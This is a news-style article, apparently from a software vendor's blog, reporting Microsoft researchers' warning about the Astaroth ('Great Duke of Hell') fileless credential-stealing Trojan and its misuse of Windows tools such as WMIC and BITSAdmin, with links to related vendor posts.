Great Duke Of Hell: The New Windows Malware Attack

Windows security has always being a topic of concern. Microsoft keeps releasing updates and patches all these years in order to strengthen the security of its system. Recently, the “Great Duke of Hell” malware becomes a hot topic.

Great Duke of Hell: the Credential-stealing Malware

What is Great Duke of Hell? To be specific, it is a Trojan program that is designed to gather the credentials of Windows users.

Researchers in the Microsoft Defender Advanced Threat Protection Research Team stated that a warning was issued to inform Windows users of the Great Duke of Hell threat.

The researchers said it’s a notorious credential-stealing malware and it’s very dangerous. Why? That is because it only uses files in the attack chain (which are tools in legitimate system), so it can hide itself in plain sight. In this way, the computer itself will be directed to program malicious commands, which makes it easy for the Duke of Hell to hide in most malware detection systems.

All in all, the Windows malware attack is potential; you may fall victim to it anytime.

Please read this Ransomware Prevention Policy carefully.

Astaroth Trojan

In fact, a lot of techniques can be applied to “Great Duke of Hell”, also known as the Astaroth Trojan: keylogging, clipboard monitoring, and so on. By using these techniques, this Windows malware can steal the login credentials easily.

The living off the land binaries (LOLbins) can be exploited by the Astaroth Trojan. Thus, a certain level of infamy for the malware was created. The risk marketing campaign was confirmed by Microsoft in the report revealed lately. And the Windows Management Instrumentation Command-line (WMIC) was proved to be the problematic LOLbin.

How Does Fileless Attack Work

According to the author of the report and Andrea Lelli, who is working in the Microsoft Defender ATP Research Team, the attack make victims have no choice but to click on a malicious link in an email. Then, the attack chain will be started through a file which runs a batch file obfuscated. In reverse, the legal WMIC system tool was run by the batch file in the manner which an obfuscated JavaScript file runs. Till then, the things are getting more troublesome. More legitimate system tools as well as more obfuscated JavaScript codes will be involved.

If the anti-malware tool Windows Defender deleted files on your PC, you should take actions immediately to recover them:

[SOLVED] Windows Defender Deleted Files, How To Get Back Easily

If you find Windows Defender deletes your files, the solutions in this post can help you rescue files and solve the issue.

Read More

What’s the most important thing in the attack-chain? Definitely, it’s the Background Intelligent Transfer Service (Bits) admin tool, which is responsible for downloading extra payloads.

Undeniably, the Great Duke of Hell is a milestone in the development process of cyber threats. The fileless malware has been a growing concern during the past years. What does fileless malware mean? In fact, it refers to the virus which doesn’t attack the system by using a specific document in it (as in the past), but is installed in the RAM of your PC. Though more and more people are aware of the fact that cyber threat becomes the primary danger to national security, the fileless attack is a unique issue. It is hard to be discovered by the traditional detecting methods; in order to find them timely, you need the help of advanced diagnostics.

The Researchers’ Point of View

As is known to all, these fileless attacks are able to run the malicious payloads directly in memory or leverage legitimate system tools to run malicious code without having to drop executable files on the disk.– said Andrea Lelli, a researcher from Microsoft Defender ATP Research Team

These attacks are considered challenging to detect as the full process of the deployment and execution of the malware is by way of those Windows LOLBins. To an average person, this activity can seem like a legitimate Windows activity because it’s being executed by Windows processes.– said Eli Salem, a security researcher at Cybereason